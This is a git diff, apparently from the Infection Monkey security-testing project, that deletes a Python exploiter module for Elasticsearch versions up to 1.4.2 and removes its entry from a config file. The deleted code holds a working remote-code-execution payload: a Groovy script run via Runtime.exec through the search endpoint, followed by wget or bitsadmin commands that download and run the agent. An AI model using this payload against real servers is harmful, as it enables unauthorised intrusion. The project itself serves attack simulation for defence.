diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index efb9a4350..b1a25d51f 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -27,7 +27,6 @@
     "SSHExploiter",
     "SmbExploiter",
     "WmiExploiter",
-    "ElasticGroovyExploiter",
     "Struts2Exploiter",
     "WebLogicExploiter",
     "HadoopExploiter",
diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py
deleted file mode 100644
index 6c2751418..000000000
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ /dev/null
@@ -1,114 +0,0 @@
-"""
-    Implementation is based on elastic search groovy exploit by metasploit
-    https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
-    /modules/exploits/multi/elasticsearch/search_groovy_script.rb
-    Max vulnerable elasticsearch version is "1.4.2"
-"""
-
-import json
-import logging
-import re
-
-import requests
-
-from common.common_consts.network_consts import ES_SERVICE
-from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
-from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.model import (
-    BITSADMIN_CMDLINE_HTTP,
-    CHECK_COMMAND,
-    CMD_PREFIX,
-    DOWNLOAD_TIMEOUT,
-    ID_STRING,
-    WGET_HTTP_UPLOAD,
-)
-from infection_monkey.network_scanning.elasticfinger import ES_PORT
-from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
-
-logger = logging.getLogger(__name__)
-
-
-class ElasticGroovyExploiter(WebRCE):
-    # attack URLs
-    MONKEY_RESULT_FIELD = "monkey_result"
-    GENERIC_QUERY = (
-        """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
-    )
-    JAVA_CMD = GENERIC_QUERY % (
-        """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec("""
-        """\\"%s\\").getText()"""
-    )
-
-    _TARGET_OS_TYPE = ["linux", "windows"]
-    _EXPLOITED_SERVICE = "Elastic search"
-
-    def __init__(self, host):
-        super(ElasticGroovyExploiter, self).__init__(host)
-
-    def get_exploit_config(self):
-        exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
-        exploit_config["dropper"] = True
-        exploit_config["url_extensions"] = ["_search?pretty"]
-        exploit_config["upload_commands"] = {
-            "linux": WGET_HTTP_UPLOAD,
-            "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
-        }
-        return exploit_config
-
-    def get_open_service_ports(self, port_list, names):
-        # We must append elastic port we get from elastic fingerprint module because It's not - marked as 'http' service
-        valid_ports = WebRCE.get_open_service_ports(self.host, port_list,
names)
-        if ES_SERVICE in self.host.services:
-            valid_ports.append([ES_PORT, False])
-        return valid_ports
-
-    def exploit(self, url, command):
-        command = re.sub(r"\\", r"\\\\\\\\", command)
-        payload = self.JAVA_CMD % command
-        try:
-            response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
-        except requests.ReadTimeout:
-            logger.error(
-                "Elastic couldn't upload monkey, because server didn't respond to upload "
-                "request."
-            )
-            return False
-        result = self.get_results(response)
-        if not result:
-            return False
-        return result[0]
-
-    def upload_monkey(self, url, commands=None):
-        result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
-        if "windows" in self.host.os["type"] and result:
-            T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
-        return result
-
-    def get_results(self, response):
-        """
-        Extracts the result data from our attack
-        :return: List of data fields or None
-        """
-        try:
-            json_resp = json.loads(response.text)
-            return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD]
-        except (KeyError, IndexError):
-            return None
-
-    def check_if_exploitable(self, url):
-        # Overridden web_rce method that adds CMD prefix for windows command
-        try:
-            if "windows" in self.host.os["type"]:
-                resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
-            else:
-                resp = self.exploit(url, CHECK_COMMAND)
-            if resp is True:
-                return True
-            elif resp is not False and ID_STRING in resp:
-                return True
-            else:
-                return False
-        except Exception as e:
-            logger.error("Host's exploitability check failed due to: %s" % e)
-            return False